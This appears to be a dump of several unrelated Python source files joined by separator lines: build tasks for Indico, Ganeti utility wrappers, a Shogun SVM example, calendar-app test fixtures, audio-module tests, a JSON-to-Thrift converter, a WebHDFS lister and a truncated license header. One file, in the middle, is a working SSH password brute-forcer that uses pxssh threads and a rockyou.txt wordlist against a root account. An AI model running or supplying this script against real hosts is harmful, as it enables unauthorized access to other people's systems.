dest_dir = os.path.join(lib_dir(env.src_dir, 'js'), 'pagedown/')
local('mkdir -p {0}'.format(dest_dir))
local('cp *.js {0}'.format(dest_dir))
# Tasks
@task
def install(recipe_name):
"""
Install a module given the recipe name
"""
RECIPES[recipe_name]()
@task
def init_submodules(src_dir='.'):
"""
Initialize submodules (fetch them from external Git repos)
"""
print green("Initializing submodules")
with lcd(src_dir):
local('pwd')
local('git submodule update --init --recursive')
def _install_deps():
"""
Install asset dependencies
"""
print green("Installing asset dependencies...")
for recipe_name in RECIPES:
print cyan("Installing {0}".format(recipe_name))
install(recipe_name)
@task
def setup_deps(n_env=None, n_version=None, src_dir=None, system_node=None):
"""
Setup (fetch and install) dependencies for Indico assets
"""
src_dir = src_dir or env.src_dir
n_env = n_env or env.node_env_path
system_node = system_node if system_node is not None else env.system_node
# initialize submodules if they haven't yet been
init_submodules(src_dir)
ext_dir = os.path.join(src_dir, 'ext_modules')
_check_present('curl')
with settings(node_env_path=n_env or os.path.join(ext_dir, 'node_env'),
node_version=n_version or env.node_version,
system_node=system_node,
src_dir=src_dir,
ext_dir=ext_dir):
if not system_node and not os.path.exists(n_env):
create_node_env()
with node_env():
local('npm install -g grunt-cli')
_install_deps()
@task
def clean_deps(src_dir=None):
"""
Clean up generated files
"""
for dtype in ASSET_TYPES:
_safe_rm('{0}/*'.format(lib_dir(src_dir or env.src_dir, dtype)), recursive=True)
@task
def cleanup(build_dir=None, force=False):
"""
Clean up build environment
"""
_safe_rm('{0}'.format(build_dir or env.build_dir), recursive=True, ask=(not force))
@task
def tarball(src_dir=None):
"""
Create a binary indico distribution
"""
src_dir = src_dir or env.src_dir
make_docs(src_dir)
setup_deps(n_env=os.path.join(src_dir, 'ext_modules', 'node_env'),
src_dir=src_dir)
local('python setup.py -q sdist')
@task
def make_docs(src_dir=None, build_dir=None, force=False):
"""
Generate Indico docs
"""
src_dir = src_dir or env.src_dir
doc_src_dir = os.path.join(src_dir, 'doc')
if build_dir is None:
target_dir = os.path.join(src_dir, 'indico', 'htdocs', 'ihelp')
else:
target_dir = os.path.join(build_dir or env.build_dir, 'indico', 'htdocs', 'ihelp')
if not force:
print yellow("Checking if docs need to be generated... "),
if _find_most_recent(target_dir) > _find_most_recent(doc_src_dir):
print green("Nope.")
return
print red("Yes :(")
_check_present('pdflatex')
print green('Generating documentation')
with lcd(doc_src_dir):
for d in DOC_DIRS:
with lcd(d):
local('make html')
local('make latex')
local('rm -rf {0}/*'.format(os.path.join(target_dir, 'html')))
local('mv build/html/* {0}'.format(os.path.join(target_dir, 'html')))
with lcd(os.path.join('guides', 'build', 'latex')):
local('make all-pdf')
local('mv *.pdf {0}'.format(os.path.join(target_dir, 'pdf')))
print green('Cleaning up')
for d in DOC_DIRS:
with lcd(d):
local('make clean')
@task
def package_release(py_versions=None, system_node=False, indico_versions=None, upstream=None, no_clean=False, force_clean=False):
"""
Create an Indico release - source and binary distributions
"""
DEVELOP_REQUIRES = ['pojson>=0.4', 'termcolor', 'werkzeug', 'nodeenv', 'fabric',
'sphinx', 'repoze.sphinx.autointerface']
py_versions = py_versions.split('/') if py_versions else env.py_versions
_check_pyenv(py_versions)
if not no_clean:
if not force_clean and not console.confirm(red("This will reset your repository to its initial "
"state (you will lose all files that are not under Git version control). Do you want to continue?"),
default=False):
sys.exit(2)
local('git clean -dx')
with pyenv_env(py_versions[-1]):
local('pip -q install {0}'.format(' '.join(DEVELOP_REQUIRES + ['babel'])))
print green('Generating '), cyan('tarball')
with settings(system_node=system_node):
# Build source tarball
tarball(os.path.dirname(__file__))
# Build binaries (EGG)
for py_version in py_versions:
with pyenv_env(py_version):
print green('Generating '), cyan('egg for Python {0}'.format(py_version))
local('pip -q install {0}'.format(' '.join(DEVELOP_REQUIRES + ['babel'])))
local('python setup.py -q bdist_egg')
print green(local('ls -lah dist/', capture=True))
|
#
#
# Copyright (C) 2006, 2007, 2010, 2011, 2012 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
"""Utility functions wrapping other functions.
"""
import sys
import time
import socket
import errno
import tempfile
import fcntl
import os
import select
import logging
def TestDelay(duration):
"""Sleep for a fixed amount of time.
@type duration: float
@param duration: the sleep duration
@rtype: boolean
@return: False for negative value, True otherwise
"""
if duration < 0:
return False, "Invalid sleep duration"
time.sleep(duration)
return True, None
def CloseFdNoError(fd, retries=5):
"""Close a file descriptor ignoring errors.
@type fd: int
@param fd: the file descriptor
@type retries: int
@param retries: how many retries to make, in case we get any
other error than EBADF
"""
try:
os.close(fd)
except OSError, err:
if err.errno != errno.EBADF:
if retries > 0:
CloseFdNoError(fd, retries - 1)
# else either it's closed already or we're out of retries, so we
# ignore this and go on
def SetCloseOnExecFlag(fd, enable):
"""Sets or unsets the close-on-exec flag on a file descriptor.
@type fd: int
@param fd: File descriptor
@type enable: bool
@param enable: Whether to set or unset it.
"""
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
if enable:
flags |= fcntl.FD_CLOEXEC
else:
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
def SetNonblockFlag(fd, enable):
"""Sets or unsets the O_NONBLOCK flag on on a file descriptor.
@type fd: int
@param fd: File descriptor
@type enable: bool
@param enable: Whether to set or unset it
"""
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
if enable:
flags |= os.O_NONBLOCK
else:
flags &= ~os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
def RetryOnSignal(fn, *args, **kwargs):
"""Calls a function again if it failed due to EINTR.
"""
while True:
try:
return fn(*args, **kwargs)
except EnvironmentError, err:
if err.errno != errno.EINTR:
raise
except (socket.error, select.error), err:
# In python 2.6 and above select.error is an IOError, so it's handled
# above, in 2.5 and below it's not, and it's handled here.
if not (err.args and err.args[0] == errno.EINTR):
raise
def IgnoreProcessNotFound(fn, *args, **kwargs):
"""Ignores ESRCH when calling a process-related function.
ESRCH is raised when a process is not found.
@rtype: bool
@return: Whether process was found
"""
try:
fn(*args, **kwargs)
except EnvironmentError, err:
# Ignore ESRCH
if err.errno == errno.ESRCH:
return False
raise
return True
def IgnoreSignals(fn, *args, **kwargs):
"""Tries to call a function ignoring failures due to EINTR.
"""
try:
return fn(*args, **kwargs)
except EnvironmentError, err:
if err.errno == errno.EINTR:
return None
else:
raise
except (select.error, socket.error), err:
# In python 2.6 and above select.error is an IOError, so it's handled
# above, in 2.5 and below it's not, and it's handled here.
if err.args and err.args[0] == errno.EINTR:
return None
else:
raise
def GetClosedTempfile(*args, **kwargs):
"""Creates a temporary file and returns its path.
"""
(fd, path) = tempfile.mkstemp(*args, **kwargs)
CloseFdNoError(fd)
return path
def IsExecutable(filename):
"""Checks whether a file exists and is executable.
@type filename: string
@param filename: Filename
@rtype: bool
"""
return os.path.isfile(filename) and os.access(filename, os.X_OK)
def ResetTempfileModule(_time=time.time):
"""Resets the random name generator of the tempfile module.
This function should be called after C{os.fork} in the child process to
ensure it creates a newly seeded random generator. Otherwise it would
generate the same random parts as the parent process. If several processes
race for the creation of a temporary file, this could lead to one not getting
a temporary name.
"""
# pylint: disable=W0212
if ((sys.hexversion >= 0x020703F0 and sys.hexversion < 0x03000000) or
sys.hexversion >= 0x030203F0):
# Python 2.7 automatically resets the RNG on pid changes (i.e. forking)
return
try:
lock = tempfile._once_lock
lock.acquire()
try:
# Re-seed random name generator
if tempfile._name_sequence:
tempfile._name_sequence.rng.seed(hash(_time()) ^ os.getpid())
finally:
lock.release()
except AttributeError:
logging.critical("The tempfile module misses at least one of the"
" '_once_lock' and '_name_sequence' attributes")
|
from pexpect import pxssh
import optparse
import time
from threading import *
maxConnections=2
connection_lock=BoundedSemaphore(value=maxConnections)
Found=False
Fails=0
def connect(host,user,password,release):
global Fails
global Found
try:
s=pxssh.pxssh()
s.login(host,user,password)
print('[+] Password found '+password)
Found=True
except Exception, e:
if 'read_nonblocking' in str(e):
Fails+=1
time.sleep(5)
connect(host,user,password,False)
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
connect(host,user,password,False)
finally:
if release:
connection_lock.release()
def main():
parser=optparse.OptionParser('usage%prog '+'-H <Host> -F <PasswdFile> -u <User>')
parser.add_option('-H',dest='targetHost',type='string',help='specify hostname')
parser.add_option('-F',dest='passwdFile',default='rockyou.txt',type='string',help='specify password file')
parser.add_option('-u',dest='user',default='root',type='string',help='specify user')
(options,args)=parser.parse_args()
host=options.targetHost
passwdFile=options.passwdFile
user=options.user
if host==None:
print(parser.usage)
exit(0)
fn=open(passwdFile,'r')
for line in fn.readlines():
if Found:
print("[*] Exiting: Password Found")
exit(0)
if Fails>5:
print("[!] Exiting: Too Many Socket Timeouts")
exit(0)
connection_lock.acquire()
password = line.strip('\r').strip('\n')
print("[-] Testing: "+str(password))
t = Thread(target=connect, args=(host, user,password, True))
child = t.start()
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
import numpy as np
def gen_data(num_classes,num_samples,dim):
np.random.seed(0)
covs = np.array([[[0., -1. ], [2.5, .7]],
[[3., -1.5], [1.2, .3]],
[[ 2, 0 ], [ .0, 1.5 ]]])
X = np.r_[np.dot(np.random.randn(num_samples, dim), covs[0]) + np.array([0, 10]),
np.dot(np.random.randn(num_samples, dim), covs[1]) + np.array([-10, -10]),
np.dot(np.random.randn(num_samples, dim), covs[2]) + np.array([10, -10])];
Y = np.hstack((np.zeros(num_samples), np.ones(num_samples), 2*np.ones(num_samples)))
return X, Y
# Number of classes
M = 3
# Number of samples of each class
N = 50
# Dimension of the data
dim = 2
traindat, label_traindat = gen_data(M,N,dim)
parameter_list = [[traindat,label_traindat]]
def structure_multiclass_bmrm(fm_train_real=traindat,label_train_multiclass=label_traindat):
from shogun import MulticlassSOLabels, LabelsFactory
from shogun import RealFeatures
from shogun import SOSVMHelper
try:
from shogun import BMRM, PPBMRM, P3BMRM, DualLibQPBMSOSVM
except ImportError:
print("At least one of BMRM, PPBMRM, P3BMRM, DualLibQPBMSOSVM not available")
exit(0)
from shogun import MulticlassModel, RealNumber
labels = MulticlassSOLabels(label_train_multiclass)
features = RealFeatures(fm_train_real.T)
model = MulticlassModel(features, labels)
sosvm = DualLibQPBMSOSVM(model, labels, 1.0)
# BMRM
sosvm.set_solver(BMRM)
sosvm.set_verbose(True)
sosvm.train()
bmrm_out = LabelsFactory.to_multiclass_structured(sosvm.apply())
count = 0
for i in range(bmrm_out.get_num_labels()):
yi_pred = RealNumber.obtain_from_generic(bmrm_out.get_label(i))
if yi_pred.value == label_train_multiclass[i]:
count = count + 1
#print("BMRM: Correct classification rate: %0.2f" % ( 100.0*count/bmrm_out.get_num_labels() ))
#hp = sosvm.get_helper()
#print hp.get_primal_values()
#print hp.get_train_errors()
# PPBMRM
w = np.zeros(model.get_dim())
sosvm.set_w(w)
sosvm.set_solver(PPBMRM)
sosvm.set_verbose(True)
sosvm.train()
ppbmrm_out = LabelsFactory.to_multiclass_structured(sosvm.apply())
count = 0
for i in range(ppbmrm_out.get_num_labels()):
yi_pred = RealNumber.obtain_from_generic(ppbmrm_out.get_label(i))
if yi_pred.value == label_train_multiclass[i]:
count = count + 1
#print("PPBMRM: Correct classification rate: %0.2f" % ( 100.0*count/ppbmrm_out.get_num_labels() ))
# P3BMRM
w = np.zeros(model.get_dim())
sosvm.set_w(w)
sosvm.set_solver(P3BMRM)
sosvm.set_verbose(True)
sosvm.train()
p3bmrm_out = LabelsFactory.to_multiclass_structured(sosvm.apply())
count = 0
for i in range(p3bmrm_out.get_num_labels()):
yi_pred = RealNumber.obtain_from_generic(p3bmrm_out.get_label(i))
if yi_pred.value == label_train_multiclass[i]:
count = count + 1
#print("P3BMRM: Correct classification rate: %0.2f" % ( 100.0*count/p3bmrm_out.get_num_labels() ))
return bmrm_out, ppbmrm_out, p3bmrm_out
if __name__=='__main__':
print('SO multiclass model with bundle methods')
a,b,c=structure_multiclass_bmrm(*parameter_list[0])
|
"""Utility functions for test cases."""
from datetime import datetime, time
from decimal import Decimal
class MockRequest404Response():
"""A mock of requests 404 response."""
def __init__(self, url, headers, data=None):
self.url = url
self.headers = headers
self.status_code = 404
self.data = data
self.text = 'Mock 404 error'
class MockRequest200Response():
"""A mock of request 200 response with custom text."""
def __init__(self, url, headers, data=None):
self.url = url
self.headers = headers
self.status_code = 200
self.data = data
APP_CONFIG = {
'api_url': 'https://127.0.0.1/api/',
'api_headers': {'user-agent': 'rdrhc-calendar',},
'calendar_defaults': {
'weekday_start': time(1, 0, 0),
'weekday_duration': Decimal('1.1'),
'weekend_start': time(5, 0, 0),
'weekend_duration': Decimal('5.5'),
'stat_start': time(9, 0, 0),
'stat_duration': Decimal('9.9'),
},
'email': {
'server': 'https://127.0.0.1/',
'from_name': 'App Owner',
'from_email': '[email protected]',
'unsubscribe_link': 'https://127.0.0.1/unsubscribe/',
'owner_name': 'App Owner',
'owner_email': '[email protected]',
},
'debug': {
'email_console': True,
},
}
USER = {
'id': 1,
'sb_user': 10,
'name': 'Test User',
'calendar_name': 'SecretCalendar',
}
# Mock old and new schedules with additions, changes, deletions,
# missing shift codes, and null shift codes
OLD_SCHEDULE = {
'2018-01-01': [
{"shift_code": "C1", "start_date": "2018-01-01"},
],
'2018-02-01': [
{"shift_code": "C1", "start_date": "2018-02-01"},
],
'2018-03-01': [
{"shift_code": "C1", "start_date": "2018-03-01"},
{"shift_code": "vr", "start_date": "2018-03-01"},
],
'2018-04-01': [
{"shift_code": "C1", "start_date": "2018-04-01"},
{"shift_code": "D1", "start_date": "2018-04-01"},
],
'2018-05-01': [
{"shift_code": "C1", "start_date": "2018-05-01"},
{"shift_code": "C2", "start_date": "2018-04-01"},
],
'2018-06-01': [
{"shift_code": "C1", "start_date": "2018-06-01"},
],
}
EXTRACTED_SCHEDULE = [
{
'shift_code': 'C1',
'start_date': datetime(2018, 1, 1),
'comment': 'SUPER STAT',
},
{
'shift_code': 'C1F',
'start_date': datetime(2018, 2, 1),
'comment': '',
},
{
'shift_code': 'C1',
'start_date': datetime(2018, 3, 1),
'comment': '',
},
{
'shift_code': 'vr',
'start_date': datetime(2018, 3, 1),
'comment': '',
},
{
'shift_code': 'D1',
'start_date': datetime(2018, 4, 1),
'comment': '',
},
{
'shift_code': 'C1',
'start_date': datetime(2018, 5, 1),
'comment': '',
},
{
'shift_code': 'C2',
'start_date': datetime(2018, 5, 1),
'comment': '',
},
{
'shift_code': 'A1',
'start_date': datetime(2018, 7, 1),
'comment': '',
},
{
'shift_code': 'C1',
'start_date': datetime(2018, 8, 1),
'comment': '',
},
{
'shift_code': 'WR',
'start_date': datetime(2018, 8, 1),
'comment': '',
},
]
NEW_SCHEDULE = [
{
'shift_code': 'C1',
'start_datetime': datetime(2018, 1, 1, 1, 0),
'end_datetime': datetime(2018, 1, 1, 2, 0),
'comment': 'SUPER STAT',
'shift_code_fk': 1,
},
{
'shift_code': 'C1F',
'start_datetime': datetime(2018, 2, 1, 2, 0),
'end_datetime': datetime(2018, 2, 1, 3, 0),
'comment': '',
'shift_code_fk': 2,
},
{
'shift_code': 'C1',
'start_datetime': datetime(2018, 3, 1, 3, 0),
'end_datetime': datetime(2018, 3, 1, 4, 0),
'comment': '',
'shift_code_fk': 1,
},
{
'shift_code': 'vr',
'start_datetime': datetime(2018, 3, 1, 3, 0),
'end_datetime': datetime(2018, 3, 1, 4, 0),
'comment': '',
'shift_code_fk': 2,
},
{
'shift_code': 'D1',
'start_datetime': datetime(2018, 4, 1, 4, 0),
'end_datetime': datetime(2018, 4, 1, 5, 0),
'comment': '',
'shift_code_fk': None,
},
{
'shift_code': 'C1',
'start_datetime': datetime(2018, 5, 1, 5, 0),
'end_datetime': datetime(2018, 5, 1, 6, 0),
'comment': '',
'shift_code_fk': 1,
},
{
'shift_code': 'C2',
'start_datetime': datetime(2018, 5, 1, 5, 0),
'end_datetime': datetime(2018, 5, 1, 6, 0),
'comment': '',
'shift_code_fk': None,
},
{
'shift_code': 'A1',
'start_datetime': datetime(2018, 7, 1, 7, 0),
'end_datetime': datetime(2018, 7, 1, 8, 0),
'comment': '',
'shift_code_fk': None,
},
{
'shift_code': 'C1',
'start_datetime': datetime(2018, 8, 1, 8, 0),
'end_datetime': datetime(2018, 8, 1, 9, 0),
'comment': '',
'shift_code_fk': 1,
},
]
# User-specific shift codes (for mocking API request)
USER_SHIFT_CODES = [
{
'id': 1, 'code': 'C1', 'sb_user': 1, 'role': 'p',
'stat_start': time(1, 0, 0), 'stat_duration': Decimal('1.1'),
'monday_start': time(2, 0, 0), 'monday_duration': Decimal('2.2'),
'tuesday_start': time(3, 0, 0), 'tuesday_duration': Decimal('3.3'),
'wednesday_start': time(4, 0, 0), 'wednesday_duration': Decimal('4.4'),
'thursday_start': time(5, 0, 0), 'thursday_duration': Decimal('5.5'),
'friday_start': time(6, 0, 0), 'friday_duration': Decimal('6.6'),
'saturday_start': time(7, 0, 0), 'saturday_duration': Decimal('7.7'),
'sunday_start': time(8, 0, 0), 'sunday_duration': Decimal('8.8'),
},
{
'id': 2, 'code': 'VR', 'sb_user': 1, 'role': 'p',
'stat_start': None, 'stat_duration': None,
'monday_start': None, 'monday_duration': None,
'tuesday_start': None, 'tuesday_duration':None,
'wednesday_start': None, 'wednesday_duration': None,
'thursday_start': None, 'thursday_duration': None,
'friday_start': None, 'friday_duration': None,
'saturday_start': None, 'saturday_duration': None,
'sunday_start': None, 'sunday_duration': None,
},
{
'id': 3, 'code': 'WR', 'sb_user': None, 'role': 'p',
'stat_start': None, 'stat_duration': None,
'monday_start': None, 'monday_duration': None,
'tuesday_start': None, 'tuesday_duration':None,
'wednesday_start': None, 'wednesday_duration': None,
'thursday_start': None, 'thursday_duration': None,
'friday_start': None, 'friday_duration': None,
'saturday_start': None, 'saturday_duration': None,
'sunday_start': None, 'sunday_duration': None,
},
]
# Stat holidays (for mocking API request)
STAT_HOLIDAYS = [
datetime(2018, 1, 1), datetime(2018, 2, 19), datetime(2018, 3, 30),
datetime(2018, 5, 21), datetime(2018, 7, 1), datetime(2018, 8, 6),
datetime(2018, 9, 3), datetime(2018, 10, 8), datetime(2018, 11, 11),
datetime(2018, 12, 25),
]
|
from test.test_support import findfile, TESTFN, unlink
import unittest
import array
import io
import pickle
import sys
import base64
class UnseekableIO(file):
def tell(self):
raise io.UnsupportedOperation
def seek(self, *args, **kwargs):
raise io.UnsupportedOperation
def fromhex(s):
return base64.b16decode(s.replace(' ', ''))
def byteswap2(data):
a = array.array('h')
a.fromstring(data)
a.byteswap()
return a.tostring()
def byteswap3(data):
ba = bytearray(data)
ba[::3] = data[2::3]
ba[2::3] = data[::3]
return bytes(ba)
def byteswap4(data):
a = array.array('i')
a.fromstring(data)
a.byteswap()
return a.tostring()
class AudioTests:
close_fd = False
def setUp(self):
self.f = self.fout = None
def tearDown(self):
if self.f is not None:
self.f.close()
if self.fout is not None:
self.fout.close()
unlink(TESTFN)
def check_params(self, f, nchannels, sampwidth, framerate, nframes,
comptype, compname):
self.assertEqual(f.getnchannels(), nchannels)
self.assertEqual(f.getsampwidth(), sampwidth)
self.assertEqual(f.getframerate(), framerate)
self.assertEqual(f.getnframes(), nframes)
self.assertEqual(f.getcomptype(), comptype)
self.assertEqual(f.getcompname(), compname)
params = f.getparams()
self.assertEqual(params,
(nchannels, sampwidth, framerate, nframes, comptype, compname))
dump = pickle.dumps(params)
self.assertEqual(pickle.loads(dump), params)
class AudioWriteTests(AudioTests):
def create_file(self, testfile):
f = self.fout = self.module.open(testfile, 'wb')
f.setnchannels(self.nchannels)
f.setsampwidth(self.sampwidth)
f.setframerate(self.framerate)
f.setcomptype(self.comptype, self.compname)
return f
def check_file(self, testfile, nframes, frames):
f = self.module.open(testfile, 'rb')
try:
self.assertEqual(f.getnchannels(), self.nchannels)
self.assertEqual(f.getsampwidth(), self.sampwidth)
self.assertEqual(f.getframerate(), self.framerate)
self.assertEqual(f.getnframes(), nframes)
self.assertEqual(f.readframes(nframes), frames)
finally:
f.close()
def test_write_params(self):
f = self.create_file(TESTFN)
f.setnframes(self.nframes)
f.writeframes(self.frames)
self.check_params(f, self.nchannels, self.sampwidth, self.framerate,
self.nframes, self.comptype, self.compname)
f.close()
def test_write(self):
f = self.create_file(TESTFN)
f.setnframes(self.nframes)
f.writeframes(self.frames)
f.close()
self.check_file(TESTFN, self.nframes, self.frames)
def test_incompleted_write(self):
with open(TESTFN, 'wb') as testfile:
testfile.write(b'ababagalamaga')
f = self.create_file(testfile)
f.setnframes(self.nframes + 1)
f.writeframes(self.frames)
f.close()
with open(TESTFN, 'rb') as testfile:
self.assertEqual(testfile.read(13), b'ababagalamaga')
self.check_file(testfile, self.nframes, self.frames)
def test_multiple_writes(self):
with open(TESTFN, 'wb') as testfile:
testfile.write(b'ababagalamaga')
f = self.create_file(testfile)
f.setnframes(self.nframes)
framesize = self.nchannels * self.sampwidth
f.writeframes(self.frames[:-framesize])
f.writeframes(self.frames[-framesize:])
f.close()
with open(TESTFN, 'rb') as testfile:
self.assertEqual(testfile.read(13), b'ababagalamaga')
self.check_file(testfile, self.nframes, self.frames)
def test_overflowed_write(self):
with open(TESTFN, 'wb') as testfile:
testfile.write(b'ababagalamaga')
f = self.create_file(testfile)
f.setnframes(self.nframes - 1)
f.writeframes(self.frames)
f.close()
with open(TESTFN, 'rb') as testfile:
self.assertEqual(testfile.read(13), b'ababagalamaga')
self.check_file(testfile, self.nframes, self.frames)
def test_unseekable_read(self):
f = self.create_file(TESTFN)
f.setnframes(self.nframes)
f.writeframes(self.frames)
f.close()
with UnseekableIO(TESTFN, 'rb') as testfile:
self.check_file(testfile, self.nframes, self.frames)
def test_unseekable_write(self):
with UnseekableIO(TESTFN, 'wb') as testfile:
f = self.create_file(testfile)
f.setnframes(self.nframes)
f.writeframes(self.frames)
f.close()
self.fout = None
self.check_file(TESTFN, self.nframes, self.frames)
def test_unseekable_incompleted_write(self):
with UnseekableIO(TESTFN, 'wb') as testfile:
testfile.write(b'ababagalamaga')
f = self.create_file(testfile)
f.setnframes(self.nframes + 1)
try:
f.writeframes(self.frames)
except IOError:
pass
try:
f.close()
except IOError:
pass
with open(TESTFN, 'rb') as testfile:
self.assertEqual(testfile.read(13), b'ababagalamaga')
self.check_file(testfile, self.nframes + 1, self.frames)
def test_unseekable_overflowed_write(self):
with UnseekableIO(TESTFN, 'wb') as testfile:
testfile.write(b'ababagalamaga')
f = self.create_file(testfile)
f.setnframes(self.nframes - 1)
try:
f.writeframes(self.frames)
except IOError:
pass
try:
f.close()
except IOError:
pass
with open(TESTFN, 'rb') as testfile:
self.assertEqual(testfile.read(13), b'ababagalamaga')
framesize = self.nchannels * self.sampwidth
self.check_file(testfile, self.nframes - 1, self.frames[:-framesize])
class AudioTestsWithSourceFile(AudioTests):
@classmethod
def setUpClass(cls):
cls.sndfilepath = findfile(cls.sndfilename, subdir='audiodata')
def test_read_params(self):
f = self.f = self.module.open(self.sndfilepath)
#self.assertEqual(f.getfp().name, self.sndfilepath)
self.check_params(f, self.nchannels, self.sampwidth, self.framerate,
self.sndfilenframes, self.comptype, self.compname)
def test_close(self):
with open(self.sndfilepath, 'rb') as testfile:
f = self.f = self.module.open(testfile)
self.assertFalse(testfile.closed)
f.close()
self.assertEqual(testfile.closed, self.close_fd)
with open(TESTFN, 'wb') as testfile:
fout = self.fout = self.module.open(testfile, 'wb')
self.assertFalse(testfile.closed)
with self.assertRaises(self.module.Error):
fout.close()
self.assertEqual(testfile.closed, self.close_fd)
fout.close() # do nothing
def test_read(self):
framesize = self.nchannels * self.sampwidth
chunk1 = self.frames[:2 * framesize]
chunk2 = self.frames[2 * framesize: 4 * framesize]
f = self.f = self.module.open(self.sndfilepath)
self.assertEqual(f.readframes(0), b'')
self.assertEqual(f.tell(), 0)
self.assertEqual(f.readframes(2), chunk1)
f.rewind()
pos0 = f.tell()
self.assertEqual(pos0, 0)
self.assertEqual(f.readframes(2), chunk1)
pos2 = f.tell()
self.assertEqual(pos2, 2)
self.assertEqual(f.readframes(2), chunk2)
f.setpos(pos2)
self.assertEqual(f.readframes(2), chunk2)
f.setpos(pos0)
self.assertEqual(f.readframes(2), chunk1)
with self.assertRaises(self.module.Error):
f.setpos(-1)
with self.assertRaises(self.module.Error):
f.setpos(f.getnframes() + 1)
def test_copy(self):
f = self.f = self.module.open(self.sndfilepath)
fout = self.fout = self.module.open(TESTFN, 'wb')
fout.setparams(f.getparams())
i = 0
n = f.getnframes()
while n > 0:
i += 1
fout.writeframes(f.readframes(i))
n -= i
fout.close()
fout = self.fout = self.module.open(TESTFN, 'rb')
f.rewind()
self.assertEqual(f.getparams(), fout.getparams())
self.assertEqual(f.readframes(f.getnframes()),
fout.readframes(fout.getnframes()))
def test_read_not_from_start(self):
with open(TESTFN, 'wb') as testfile:
testfile.write(b'ababagalamaga')
with open(self.sndfilepath, 'rb') as f:
testfile.write(f.read())
with open(TESTFN, 'rb') as testfile:
self.assertEqual(testfile.read(13), b'ababagalamaga')
f = self.module.open(testfile, 'rb')
try:
self.assertEqual(f.getnchannels(), self.nchannels)
self.assertEqual(f.getsampwidth(), self.sampwidth)
self.assertEqual(f.getframerate(), self.framerate)
self.assertEqual(f.getnframes(), self.sndfilenframes)
self.assertEqual(f.readframes(self.nframes), self.frames)
finally:
f.close()
|
'''
constructs new FilterNames instance from JSON
'''
import os
import sys
import json
from _filter import Filter
from ttypes import FilterNames
def log(m):
sys.stderr.write(m)
sys.stderr.write('\n')
sys.stderr.flush()
def convert_utf8(dict_of_unicode):
_new_dict = dict()
for key, values in dict_of_unicode.items():
_new_dict[key.encode('utf8')] = [val.encode('utf8') for val in values]
return _new_dict
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('input', nargs='?', help='path to JSON file that is either name-->[target_id, ...], or target_id-->[name, ...], defaults to stdin')
parser.add_argument('--target-id-to-names', default=False, action='store_true',
help='pass this flag if input JSON file has target_id string as the primary key')
parser.add_argument('output', nargs='?', default=None, help='path to output file for large thrift message, defaults to stdout.')
args = parser.parse_args()
filter = Filter()
if args.input:
i_fh = open(args.input)
else:
i_fh = sys.stdin
log('loading %s' % args.input)
if args.target_id_to_names:
unicode_target_id_to_names = json.load(i_fh)
log('%d target_ids loaded' % len(unicode_target_id_to_names))
utf8_target_id_to_names = convert_utf8( unicode_target_id_to_names )
filter_names = FilterNames(target_id_to_names=utf8_target_id_to_names)
## reach under the head and act like we called load_filter_names
## instea of building it from JSON like we did above
filter.filter_names = filter_names
filter.invert_filter_names()
else:
unicode_name_to_target_ids = json.load(i_fh)
target_ids = set()
for target_ids_list in unicode_name_to_target_ids.values():
target_ids.update(target_ids_list)
log('%d names, %d target_ids loaded' % (len(unicode_name_to_target_ids), len(target_ids)))
utf8_name_to_target_ids = convert_utf8(unicode_name_to_target_ids)
filter_names = FilterNames(name_to_target_ids=utf8_name_to_target_ids)
## reach under the head and act like we called load_filter_names
## instea of building it from JSON like we did above
filter.filter_names = filter_names
if args.output:
o_fh = open(args.output, mode='wb')
else:
o_fh = sys.stdout
filter.save_filter_names(file_obj=o_fh)
log('flushing to %s' % (args.output or 'stdout'))
o_fh.close()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import urllib2
import json
class Tools(object):
@staticmethod
def get_active(nn_urls):
nn = nn_urls
if "," in nn:
nn = nn.split(",")
else:
url = 'http://' + nn
return url
for u in nn:
url = 'http://' + u
check_url = url + '/jmx?qry=Hadoop:service=NameNode,name=NameNodeStatus'
try:
res = json.load(urllib2.urlopen(check_url))
if res['beans'][0]['State'] == 'active':
return url
except:
continue
@staticmethod
def hdfs_status(nn, path, user='hdfs'):
url = nn + '/webhdfs/v1' + path + '?op=LISTSTATUS' + '&user.name=' + user
raw = urllib2.urlopen(url)
res = json.loads(raw.read())
return res[u'FileStatuses'][u'FileStatus']
class Base(object):
def __init__(self, nn_urls, hdfs_path, local_path, action='sync', user='hdfs'):
self.nn_urls = nn_urls
self.action = action
self.hdfs_path = hdfs_path
self.local_path = local_path
self.user = user
def start(self):
if self.action == 'sync':
self.route(self.hdfs_path)
def route(self, _path):
url = Tools.get_active(self.nn_urls) + '/webhdfs/v1' + _path + '?op=LISTSTATUS' + '&user.name=' + self.user
res = json.load(urllib2.urlopen(url))
for d in res[u'FileStatuses'][u'FileStatus']:
_now_path = "%s%s" % (_path, d['pathSuffix'])
if d['type'] == 'FILE':
print "%s" % _now_path
elif d['type'] == 'DIRECTORY':
print "%s/" % _now_path
self.route(_now_path + '/')
if __name__ == '__main__':
instance = Base(nn_urls='10.123.59.17:50070,10.123.72.244:50070', hdfs_path=sys.argv[1], local_path=sys.argv[2])
instance.start()
|
#!/usr/bin/env python2.7
#The MIT License (MIT)
#Copyright (c) 2015-2016 mh4x0f P0cL4bs Team
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
